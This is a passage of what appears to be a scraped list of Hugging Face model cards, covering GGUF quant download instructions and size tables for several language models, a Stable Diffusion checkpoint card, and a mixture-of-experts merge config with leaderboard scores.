huggingface-cli download bartowski/phi3-4x4b-v1-GGUF --include "phi3-4x4b-v1-Q4_K_M.gguf" --local-dir ./
```
If the model is bigger than 50GB, it will have been split into multiple files. In order to download them all to a local folder, run:
```
huggingface-cli download bartowski/phi3-4x4b-v1-GGUF --include "phi3-4x4b-v1-Q8_0.gguf/*" --local-dir phi3-4x4b-v1-Q8_0
```
You can either specify a new local-dir (phi3-4x4b-v1-Q8_0) or download them all in place (./)
## Which file should I choose?
A great write up with charts showing various performances is provided by Artefact2 [here](https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9)
The first thing to figure out is how big a model you can run. To do this, you'll need to figure out how much RAM and/or VRAM you have.
If you want your model running as FAST as possible, you'll want to fit the whole thing on your GPU's VRAM. Aim for a quant with a file size 1-2GB smaller than your GPU's total VRAM.
If you want the absolute maximum quality, add both your system RAM and your GPU's VRAM together, then similarly grab a quant with a file size 1-2GB smaller than that total.
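As a toy illustration of this sizing rule (sizes taken from the table above; the VRAM figure is just an example):
```python
# Pick the largest quant that leaves roughly 1GB of headroom on the GPU.
# Sizes come from the table in this README; the VRAM figure is an example.
sizes_gb = {"Q8_0": 11.76, "Q6_K": 9.08, "Q5_K_M": 7.85, "Q5_K_S": 7.62,
            "Q4_K_M": 6.70, "Q4_K_S": 6.30, "IQ4_XS": 5.91, "Q3_K_L": 5.78}
vram_gb = 8
candidates = {name: size for name, size in sizes_gb.items() if size <= vram_gb - 1.0}
print(max(candidates, key=candidates.get))  # -> Q4_K_M for an 8GB card
```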
Next, you'll need to decide if you want to use an 'I-quant' or a 'K-quant'.
If you don't want to think too much, grab one of the K-quants. These are in format 'QX_K_X', like Q5_K_M.
If you want to get more into the weeds, you can check out this extremely useful feature chart:
[llama.cpp feature matrix](https://github.com/ggerganov/llama.cpp/wiki/Feature-matrix)
But basically, if you're aiming for below Q4, and you're running cuBLAS (Nvidia) or rocBLAS (AMD), you should look towards the I-quants. These are in format IQX_X, like IQ3_M. These are newer and offer better performance for their size.
These I-quants can also be used on CPU and Apple Metal, but will be slower than their K-quant equivalent, so speed vs performance is a tradeoff you'll have to decide.
The I-quants are *not* compatible with Vulkan, which also supports AMD, so if you have an AMD card double-check whether you're using the rocBLAS build or the Vulkan build. At the time of writing this, LM Studio has a preview with ROCm support, and other inference engines have specific builds for ROCm.
Want to support my work? Visit my ko-fi page here: https://ko-fi.com/bartowski
|
mradermacher/Qwen2-1.5b-ETS-GGUF | mradermacher | "2024-06-27T20:05:35Z" | 3,547 | 0 | transformers | [
"transformers",
"gguf",
"text-generation-inference",
"unsloth",
"qwen2",
"trl",
"sft",
"en",
"base_model:notmebug/Qwen2-1.5b-ETS",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | "2024-06-27T19:59:30Z" | ---
base_model: notmebug/Qwen2-1.5b-ETS
language:
- en
library_name: transformers
license: apache-2.0
quantized_by: mradermacher
tags:
- text-generation-inference
- transformers
- unsloth
- qwen2
- trl
- sft
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/notmebug/Qwen2-1.5b-ETS
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q2_K.gguf) | Q2_K | 0.8 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.IQ3_XS.gguf) | IQ3_XS | 0.8 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q3_K_S.gguf) | Q3_K_S | 0.9 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.IQ3_S.gguf) | IQ3_S | 0.9 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.IQ3_M.gguf) | IQ3_M | 0.9 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q3_K_M.gguf) | Q3_K_M | 0.9 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q3_K_L.gguf) | Q3_K_L | 1.0 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.IQ4_XS.gguf) | IQ4_XS | 1.0 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q4_K_S.gguf) | Q4_K_S | 1.0 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q4_K_M.gguf) | Q4_K_M | 1.1 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q5_K_S.gguf) | Q5_K_S | 1.2 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q5_K_M.gguf) | Q5_K_M | 1.2 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q6_K.gguf) | Q6_K | 1.4 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q8_0.gguf) | Q8_0 | 1.7 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.f16.gguf) | f16 | 3.2 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
mradermacher/ReviledSoup-L3-8B-i1-GGUF | mradermacher | "2024-06-08T11:53:19Z" | 3,543 | 0 | transformers | [
"transformers",
"gguf",
"mergekit",
"merge",
"en",
"base_model:Revile/ReviledSoup-L3-8B",
"endpoints_compatible",
"region:us"
] | null | "2024-06-08T10:39:15Z" | ---
base_model: Revile/ReviledSoup-L3-8B
language:
- en
library_name: transformers
quantized_by: mradermacher
tags:
- mergekit
- merge
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: nicoboss -->
weighted/imatrix quants of https://huggingface.co/Revile/ReviledSoup-L3-8B
<!-- provided-files -->
static quants are available at https://huggingface.co/mradermacher/ReviledSoup-L3-8B-GGUF
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ1_S.gguf) | i1-IQ1_S | 2.1 | for the desperate |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ1_M.gguf) | i1-IQ1_M | 2.3 | mostly desperate |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ2_XXS.gguf) | i1-IQ2_XXS | 2.5 | |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ2_XS.gguf) | i1-IQ2_XS | 2.7 | |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ2_S.gguf) | i1-IQ2_S | 2.9 | |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ2_M.gguf) | i1-IQ2_M | 3.0 | |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q2_K.gguf) | i1-Q2_K | 3.3 | IQ3_XXS probably better |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ3_XXS.gguf) | i1-IQ3_XXS | 3.4 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ3_XS.gguf) | i1-IQ3_XS | 3.6 | |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q3_K_S.gguf) | i1-Q3_K_S | 3.8 | IQ3_XS probably better |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ3_S.gguf) | i1-IQ3_S | 3.8 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ3_M.gguf) | i1-IQ3_M | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q3_K_M.gguf) | i1-Q3_K_M | 4.1 | IQ3_S probably better |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q3_K_L.gguf) | i1-Q3_K_L | 4.4 | IQ3_M probably better |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ4_XS.gguf) | i1-IQ4_XS | 4.5 | |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q4_0.gguf) | i1-Q4_0 | 4.8 | fast, low quality |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q4_K_S.gguf) | i1-Q4_K_S | 4.8 | optimal size/speed/quality |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q4_K_M.gguf) | i1-Q4_K_M | 5.0 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q5_K_S.gguf) | i1-Q5_K_S | 5.7 | |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q5_K_M.gguf) | i1-Q5_K_M | 5.8 | |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q6_K.gguf) | i1-Q6_K | 6.7 | practically like static Q6_K |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time. Additional thanks to [@nicoboss](https://huggingface.co/nicoboss) for giving me access to his hardware for calculating the imatrix for these quants.
<!-- end -->
|
Yntec/Lyriel | Yntec | "2023-10-13T02:39:06Z" | 3,542 | 2 | diffusers | [
"diffusers",
"safetensors",
"General",
"Fantasy",
"Banned",
"stable-diffusion",
"stable-diffusion-diffusers",
"text-to-image",
"license:creativeml-openrail-m",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | "2023-10-13T00:41:22Z" | ---
license: creativeml-openrail-m
library_name: diffusers
pipeline_tag: text-to-image
tags:
- General
- Fantasy
- Banned
- stable-diffusion
- stable-diffusion-diffusers
- diffusers
- text-to-image
---
# Lyriel 1.2
Original model page: https://civitai.com/models/22922?modelVersionId=32704
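A minimal `diffusers` sketch for this checkpoint is shown below; the generation settings are assumptions rather than tuned recommendations.
```python
# Minimal diffusers sketch; steps and guidance scale are assumptions, not tuned values.
import torch
from diffusers import StableDiffusionPipeline

pipe = StableDiffusionPipeline.from_pretrained("Yntec/Lyriel", torch_dtype=torch.float16)
pipe = pipe.to("cuda")

prompt = "pretty cute girl playing a videogame, detailed chibi eyes, sharp focus"
image = pipe(prompt, num_inference_steps=30, guidance_scale=7.5).images[0]
image.save("lyriel_sample.png")
```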
Sample and prompt:

Pretty CUTE Girl, playing videogame, sitting on tv monitor, gorgeous detailed hair, curly bangs, Ponytail, sneakers Magazine ad, DETAILED CHIBI EYES, iconic, 1940, sharp focus. Illustration By ROSSDRAWS and KlaysMoji and Dave Rapoza and artgerm and leyendecker and Clay Mann |
jsfs11/MixtureofMerges-MoE-4x7b-v4 | jsfs11 | "2024-03-03T00:04:37Z" | 3,542 | 3 | transformers | [
"transformers",
"safetensors",
"mixtral",
"text-generation",
"moe",
"frankenmoe",
"merge",
"mergekit",
"lazymergekit",
"flemmingmiguel/MBX-7B-v3",
"Kukedlc/NeuTrixOmniBe-7B-model-remix",
"PetroGPT/WestSeverus-7B-DPO",
"vanillaOVO/supermario_v4",
"base_model:flemmingmiguel/MBX-7B-v3",
"base_model:Kukedlc/NeuTrixOmniBe-7B-model-remix",
"base_model:PetroGPT/WestSeverus-7B-DPO",
"base_model:vanillaOVO/supermario_v4",
"license:apache-2.0",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2024-02-11T06:55:36Z" | ---
license: apache-2.0
tags:
- moe
- frankenmoe
- merge
- mergekit
- lazymergekit
- flemmingmiguel/MBX-7B-v3
- Kukedlc/NeuTrixOmniBe-7B-model-remix
- PetroGPT/WestSeverus-7B-DPO
- vanillaOVO/supermario_v4
base_model:
- flemmingmiguel/MBX-7B-v3
- Kukedlc/NeuTrixOmniBe-7B-model-remix
- PetroGPT/WestSeverus-7B-DPO
- vanillaOVO/supermario_v4
model-index:
- name: MixtureofMerges-MoE-4x7b-v4
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: AI2 Reasoning Challenge (25-Shot)
type: ai2_arc
config: ARC-Challenge
split: test
args:
num_few_shot: 25
metrics:
- type: acc_norm
value: 72.53
name: normalized accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=jsfs11/MixtureofMerges-MoE-4x7b-v4
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: HellaSwag (10-Shot)
type: hellaswag
split: validation
args:
num_few_shot: 10
metrics:
- type: acc_norm
value: 88.85
name: normalized accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=jsfs11/MixtureofMerges-MoE-4x7b-v4
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU (5-Shot)
type: cais/mmlu
config: all
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 64.53
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=jsfs11/MixtureofMerges-MoE-4x7b-v4
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: TruthfulQA (0-shot)
type: truthful_qa
config: multiple_choice
split: validation
args:
num_few_shot: 0
metrics:
- type: mc2
value: 75.3
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=jsfs11/MixtureofMerges-MoE-4x7b-v4
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: Winogrande (5-shot)
type: winogrande
config: winogrande_xl
split: validation
args:
num_few_shot: 5
metrics:
- type: acc
value: 84.85
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=jsfs11/MixtureofMerges-MoE-4x7b-v4
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GSM8k (5-shot)
type: gsm8k
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 71.34
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=jsfs11/MixtureofMerges-MoE-4x7b-v4
name: Open LLM Leaderboard
---
# MixtureofMerges-MoE-4x7b-v4
MixtureofMerges-MoE-4x7b-v4 is a Mixture of Experts (MoE) made with the following models using [LazyMergekit](https://colab.research.google.com/drive/1obulZ1ROXHjYLn6PPZJwRR6GzgQogxxb?usp=sharing):
* [flemmingmiguel/MBX-7B-v3](https://huggingface.co/flemmingmiguel/MBX-7B-v3)
* [Kukedlc/NeuTrixOmniBe-7B-model-remix](https://huggingface.co/Kukedlc/NeuTrixOmniBe-7B-model-remix)
* [PetroGPT/WestSeverus-7B-DPO](https://huggingface.co/PetroGPT/WestSeverus-7B-DPO)
* [vanillaOVO/supermario_v4](https://huggingface.co/vanillaOVO/supermario_v4)
## 🧩 Configuration
```yaml
base_model: Kukedlc/NeuTrixOmniBe-7B-model-remix
gate_mode: hidden
dtype: bfloat16
experts:
- source_model: flemmingmiguel/MBX-7B-v3
positive_prompts:
- "Answer this question from the ARC (Argument Reasoning Comprehension)."
- "Use common sense and logical reasoning skills."
- "What assumptions does this argument rely on?"
- "Are these assumptions valid? Explain."
- "Could this be explained in a different way? Provide an alternative explanation."
- "Identify any weaknesses in this argument."
- "Does this argument contain any logical fallacies? If so, which ones?"
negative_prompts:
- "misses key evidence"
- "overly general"
- "focuses on irrelevant details"
- "assumes information not provided"
- "relies on stereotypes"
- source_model: Kukedlc/NeuTrixOmniBe-7B-model-remix
positive_prompts:
- "Answer this question, demonstrating commonsense understanding and using any relevant general knowledge you may have."
- "Provide a concise summary of this passage, then explain why the highlighted section is essential to the main idea."
- "Read these two brief articles presenting different viewpoints on the same topic. List their key arguments and highlight where they disagree."
- "Paraphrase this statement, changing the emotional tone but keeping the core meaning intact. Example: Rephrase a worried statement in a humorous way"
- "Create a short analogy that helps illustrate the main concept of this article."
negative_prompts:
- "sounds too basic"
- "understated"
- "dismisses important details"
- "avoids the question's nuance"
- "takes this statement too literally"
- source_model: PetroGPT/WestSeverus-7B-DPO
positive_prompts:
- "Calculate the answer to this math problem"
- "My mathematical capabilities are strong, allowing me to handle complex mathematical queries"
- "solve for"
- "A store sells apples at $0.50 each. If Emily buys 12 apples, how much does she need to pay?"
- "Isolate x in the following equation: 2x + 5 = 17"
- "Solve this equation and show your working."
- "Explain why you used this formula to solve the problem."
- "Attempt to divide this number by zero. Explain why this cannot be done."
negative_prompts:
- "incorrect"
- "inaccurate"
- "creativity"
- "assumed without proof"
- "rushed calculation"
- "confuses mathematical concepts"
- "draws illogical conclusions"
- "circular reasoning"
- source_model: vanillaOVO/supermario_v4
positive_prompts:
- "Generate a few possible continuations to this scenario."
- "Demonstrate understanding of everyday commonsense in your response."
- "Use contextual clues to determine the most likely outcome."
- "Continue this scenario, but make the writing style sound archaic and overly formal."
- "This narrative is predictable. Can you introduce an unexpected yet plausible twist?"
- "The character is angry. Continue this scenario showcasing a furious outburst."
negative_prompts:
- "repetitive phrases"
- "overuse of the same words"
- "contradicts earlier statements - breaks the internal logic of the scenario"
- "out of character dialogue"
- "awkward phrasing - sounds unnatural"
- "doesn't match the given genre"
```
## 💻 Usage
```python
!pip install -qU transformers bitsandbytes accelerate
from transformers import AutoTokenizer
import transformers
import torch
model = "jsfs11/MixtureofMerges-MoE-4x7b-v4"
tokenizer = AutoTokenizer.from_pretrained(model)
pipeline = transformers.pipeline(
"text-generation",
model=model,
model_kwargs={"torch_dtype": torch.float16, "load_in_4bit": True},
)
messages = [{"role": "user", "content": "Explain what a Mixture of Experts is in less than 100 words."}]
prompt = pipeline.tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
outputs = pipeline(prompt, max_new_tokens=256, do_sample=True, temperature=0.7, top_k=50, top_p=0.95)
print(outputs[0]["generated_text"])
```
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_jsfs11__MixtureofMerges-MoE-4x7b-v4)
| Metric |Value|
|---------------------------------|----:|
|Avg. |76.23|
|AI2 Reasoning Challenge (25-Shot)|72.53|
|HellaSwag (10-Shot) |88.85|
|MMLU (5-Shot) |64.53|
|TruthfulQA (0-shot) |75.30|
|Winogrande (5-shot) |84.85|
|GSM8k (5-shot) |71.34|
|